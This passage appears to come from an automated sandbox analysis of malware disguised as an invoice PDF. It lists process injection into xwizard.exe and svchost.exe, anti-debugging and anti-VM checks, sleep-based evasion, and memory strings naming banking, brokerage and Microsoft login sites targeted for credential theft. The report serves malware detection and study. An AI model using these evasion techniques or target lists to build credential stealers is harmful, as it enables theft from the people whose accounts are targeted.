                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4_2_064E0E4D push 79675D9Eh; retf 4_2_064E0E53
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4_2_064EDEE2 push edi; retf 4_2_064EDEE6
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4_2_064E6F42 push cs; retf 4_2_064E6F43
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4_2_064E77F0 push eax; ret 4_2_064E77F1
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4_2_064E9C7A push ds; retf 4_2_064E9CCA
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4_2_064E54F2 push ss; retf 4_2_064E550B
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4_2_064E9C8F push ds; retf 4_2_064E9CCA
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4_2_064E74AB pushfd ; iretd 4_2_064E74AC
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4_2_064D955B push FFFFFFF6h; iretd 4_2_064D955D
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4_2_064E2D35 push BD1E4A2Bh; ret 4_2_064E2D3C
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4_2_064E85E5 push ss; iretd 4_2_064E85E8
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4_2_064EEADE push eax; ret 4_2_064EEAE0
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004772DE
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004440780_2_00444078
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeAPI/Special instruction interceptor: Address: 2E55294
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\xwizard.exeWindow / User API: threadDelayed 9641Jump to behavior
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-86029
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-84938
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeAPI coverage: 3.3 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\xwizard.exeAPI coverage: 2.8 %
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe TID: 7752Thread sleep time: -55000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe TID: 7752Thread sleep count: 31 > 30Jump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe TID: 7752Thread sleep time: -46500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe TID: 7752Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe TID: 7752Thread sleep time: -33000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exe TID: 7720Thread sleep count: 331 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exe TID: 7720Thread sleep time: -662000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exe TID: 7720Thread sleep count: 9641 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exe TID: 7720Thread sleep time: -19282000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\xwizard.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_0301C840 FindFirstFileW,FindNextFileW,FindClose,5_2_0301C840
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
                Source: 293v7V-J3.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 293v7V-J3.5.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 293v7V-J3.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 293v7V-J3.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 293v7V-J3.5.drBinary or memory string: global block list test formVMware20,11696428655
                Source: 293v7V-J3.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 293v7V-J3.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 293v7V-J3.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 293v7V-J3.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 293v7V-J3.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 293v7V-J3.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 293v7V-J3.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 293v7V-J3.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 293v7V-J3.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 293v7V-J3.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4502211397.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4501845196.0000000003216000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2638568966.000001B36FA0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 293v7V-J3.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 293v7V-J3.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 293v7V-J3.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 293v7V-J3.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 293v7V-J3.5.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 293v7V-J3.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: 293v7V-J3.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 293v7V-J3.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 293v7V-J3.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 293v7V-J3.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 293v7V-J3.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 293v7V-J3.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 293v7V-J3.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 293v7V-J3.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 293v7V-J3.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 293v7V-J3.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeAPI call chain: ExitProcess graph end nodegraph_0-84830
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417DD3 LdrLoadDll,2_2_00417DD3
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0045A259 BlockInput,0_2_0045A259
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_02E55560 mov eax, dword ptr fs:[00000030h]0_2_02E55560
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_02E55500 mov eax, dword ptr fs:[00000030h]0_2_02E55500
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_02E53EC0 mov eax, dword ptr fs:[00000030h]0_2_02E53EC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D437C mov eax, dword ptr fs:[00000030h]2_2_037D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h]2_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8350 mov ecx, dword ptr fs:[00000030h]2_2_037D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h]2_2_0372C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h]2_2_03750310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037663FF mov eax, dword ptr fs:[00000030h]2_2_037663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov ecx, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h]2_2_037EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h]2_2_037B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372826B mov eax, dword ptr fs:[00000030h]2_2_0372826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h]2_2_0372A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736259 mov eax, dword ptr fs:[00000030h]2_2_03736259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372823B mov eax, dword ptr fs:[00000030h]2_2_0372823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h]2_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h]2_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
